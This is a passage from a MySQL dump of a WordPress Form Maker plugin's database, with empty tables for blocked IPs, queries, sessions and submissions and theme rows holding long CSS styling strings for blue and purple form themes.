  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_blocked`
--

LOCK TABLES `lwz_formmaker_blocked` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_blocked` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_formmaker_blocked` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_query`
--

DROP TABLE IF EXISTS `lwz_formmaker_query`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_query` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `query` text NOT NULL,
  `details` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_query`
--

LOCK TABLES `lwz_formmaker_query` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_query` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_formmaker_query` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_sessions`
--

DROP TABLE IF EXISTS `lwz_formmaker_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_sessions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(20) NOT NULL,
  `group_id` int(20) NOT NULL,
  `ip` varchar(20) NOT NULL,
  `ord_date` datetime NOT NULL,
  `ord_last_modified` datetime NOT NULL,
  `status` varchar(50) NOT NULL,
  `full_name` varchar(100) NOT NULL,
  `email` varchar(50) NOT NULL,
  `phone` varchar(50) NOT NULL,
  `mobile_phone` varchar(255) NOT NULL,
  `fax` varchar(255) NOT NULL,
  `address` varchar(300) NOT NULL,
  `paypal_info` text NOT NULL,
  `without_paypal_info` text NOT NULL,
  `ipn` varchar(20) NOT NULL,
  `checkout_method` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `shipping` float NOT NULL,
  `shipping_type` varchar(200) NOT NULL,
  `read` int(11) NOT NULL,
  `total` float NOT NULL,
  `currency` varchar(24) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_sessions`
--

LOCK TABLES `lwz_formmaker_sessions` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_formmaker_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_submits`
--

DROP TABLE IF EXISTS `lwz_formmaker_submits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_submits` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `element_label` varchar(128) NOT NULL,
  `element_value` varchar(600) NOT NULL,
  `group_id` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `ip` varchar(32) NOT NULL,
  `user_id_wd` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_submits`
--

LOCK TABLES `lwz_formmaker_submits` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_submits` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_formmaker_submits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_formmaker_themes`
--

DROP TABLE IF EXISTS `lwz_formmaker_themes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_formmaker_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `css` text NOT NULL,
  `default` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=38 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_formmaker_themes`
--

LOCK TABLES `lwz_formmaker_themes` WRITE;
/*!40000 ALTER TABLE `lwz_formmaker_themes` DISABLE KEYS */;
INSERT INTO `lwz_formmaker_themes` VALUES (1,'Theme 01 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #013D7C;\r\nborder-radius: 5px;\r\ncolor: #013D7C;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #013D7C;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #013E7D;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #013E7D;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #013E7F;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(2,'Theme 01 purple','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #6C005E;\r\nborder-radius: 5px;\r\ncolor: #6C005E;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type=\"radio\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type=\"checkbox\"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #6C005E;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #6C005E;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #6C005E;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #6C005E;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label 